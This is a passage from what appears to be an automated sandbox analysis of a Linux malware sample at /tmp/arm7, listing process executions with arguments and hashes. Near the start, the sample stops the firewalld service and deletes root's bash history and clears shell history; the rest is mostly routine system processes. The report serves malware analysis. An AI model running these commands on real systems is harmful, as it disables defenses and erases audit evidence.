                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                General

                                Start time:03:08:36
                                Start date:11/11/2021
                                Path:/usr/bin/systemctl
                                Arguments:systemctl stop firewalld.service
                                File size:996584 bytes
                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                General

                                Start time:03:08:36
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:36
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "rm -rf ~/.bash_history"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:36
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:36
                                Start date:11/11/2021
                                Path:/usr/bin/rm
                                Arguments:rm -rf /root/.bash_history
                                File size:72056 bytes
                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                General

                                Start time:03:08:36
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:36
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "history -c"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:55
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:08:55
                                Start date:11/11/2021
                                Path:/usr/bin/whoopsie
                                Arguments:/usr/bin/whoopsie -f
                                File size:68592 bytes
                                MD5 hash:d3a6915d0e7398fb4c89a037c13959c8

                                General

                                Start time:03:08:59
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:08:59
                                Start date:11/11/2021
                                Path:/usr/sbin/sshd
                                Arguments:/usr/sbin/sshd -t
                                File size:876328 bytes
                                MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                General

                                Start time:03:08:59
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:08:59
                                Start date:11/11/2021
                                Path:/usr/sbin/sshd
                                Arguments:/usr/sbin/sshd -D
                                File size:876328 bytes
                                MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                General

                                Start time:03:09:06
                                Start date:11/11/2021
                                Path:/usr/sbin/gdm3
                                Arguments:n/a
                                File size:453296 bytes
                                MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                General

                                Start time:03:09:06
                                Start date:11/11/2021
                                Path:/etc/gdm3/PrimeOff/Default
                                Arguments:/etc/gdm3/PrimeOff/Default
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:06
                                Start date:11/11/2021
                                Path:/usr/sbin/gdm3
                                Arguments:n/a
                                File size:453296 bytes
                                MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                General

                                Start time:03:09:06
                                Start date:11/11/2021
                                Path:/etc/gdm3/PrimeOff/Default
                                Arguments:/etc/gdm3/PrimeOff/Default
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:06
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:09:06
                                Start date:11/11/2021
                                Path:/usr/lib/accountsservice/accounts-daemon
                                Arguments:/usr/lib/accountsservice/accounts-daemon
                                File size:203192 bytes
                                MD5 hash:01a899e3fb5e7e434bea1290255a1f30

                                General

                                Start time:03:09:28
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:09:28
                                Start date:11/11/2021
                                Path:/usr/bin/pulseaudio
                                Arguments:/usr/bin/pulseaudio --daemonize=no --log-target=journal
                                File size:100832 bytes
                                MD5 hash:0c3b4c789d8ffb12b25507f27e14c186

                                General

                                Start time:03:09:32
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:09:32
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:09:32
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:09:32
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:32
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:32
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:09:32
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:09:32
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/share/gdm/generate-config
                                Arguments:/usr/share/gdm/generate-config
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/share/gdm/generate-config
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/pkill
                                Arguments:pkill --signal HUP --uid gdm dconf-service
                                File size:30968 bytes
                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                General

                                Start time:03:09:35
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:09:35
                                Start date:11/11/2021
                                Path:/usr/lib/gdm3/gdm-wait-for-drm
                                Arguments:/usr/lib/gdm3/gdm-wait-for-drm
                                File size:14640 bytes
                                MD5 hash:82043ba752c6930b4e6aaea2f7747545

                                General

                                Start time:03:09:41
                                Start date:11/11/2021
                                Path:/usr/libexec/gvfsd-fuse
                                Arguments:n/a
                                File size:47632 bytes
                                MD5 hash:d18fbf1cbf8eb57b17fac48b7b4be933

                                General

                                Start time:03:09:41
                                Start date:11/11/2021
                                Path:/bin/fusermount
                                Arguments:fusermount -u -q -z -- /run/user/1000/gvfs
                                File size:39144 bytes
                                MD5 hash:576a1b135c82bdcbc97a91acea900566

                                General

                                Start time:03:09:44
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:09:44
                                Start date:11/11/2021
                                Path:/lib/systemd/systemd-user-runtime-dir
                                Arguments:/lib/systemd/systemd-user-runtime-dir stop 1000
                                File size:22672 bytes
                                MD5 hash:d55f4b0847f88131dbcfb07435178e54

                                General

                                Start time:03:09:45
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:09:45
                                Start date:11/11/2021
                                Path:/usr/sbin/gdm3
                                Arguments:/usr/sbin/gdm3
                                File size:453296 bytes
                                MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:11:18
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:11:18
                                Start date:11/11/2021
                                Path:/usr/share/gdm/generate-config
                                Arguments:/usr/share/gdm/generate-config
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:18
                                Start date:11/11/2021
                                Path:/usr/share/gdm/generate-config
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:18
                                Start date:11/11/2021
                                Path:/usr/bin/pkill
